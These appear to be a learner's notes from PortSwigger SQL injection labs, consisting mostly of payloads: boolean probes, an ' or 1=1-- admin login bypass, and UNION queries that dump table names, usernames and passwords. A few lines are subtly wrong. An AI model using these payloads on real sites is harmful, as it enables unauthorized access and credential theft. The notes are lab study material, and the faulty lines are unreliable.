sql injection

1  Discovering SQL Injections:    '


@1   path TRUE >>>   https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories%27+and+1=1--
@2   path FALSE >>>   https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories%27+and+1=0--


2  Bypassing Admin Login Using Logical Operators: >> ' or 1=1--


user   >>>  administrator
p@sswd >>>  ' or 1=1--


3  Selecting Data From the Database:  >> 'Order+by+1--     

https://portswigger.net/web-security/sql-injection/cheat-sheet
--------------

@1  https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories'Order+by+1--
@2  https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories'+union+select+1,2--
@3  https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories%27+union+select+NULL,NULL--
@4  https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories%27+union+select+%27a%27,NULL--
@5  https://0aa8004103b69354819a6bbd00c600b8.web-security-academy.net/filter?category=Accessories'+union+select+version(),NULL--


4  Accessing The Database Admin Records:



@1  check_vulnerability >>>>  '+union+select+username,NULL+from+users
@2  '+union+select+table_name,NULL+from+information_schema.tables-- 
@3  'union+select+username,NULL+from+information_schema.columns+where+table_name='users'--       ex:  >>> select col_name from table_name users

@4  'union+select+username,NULL+from+users--

@5  'union+select+password,NULL+from+users--

@6  'union+select+password,NULL+from+users+where+username='administrator'--




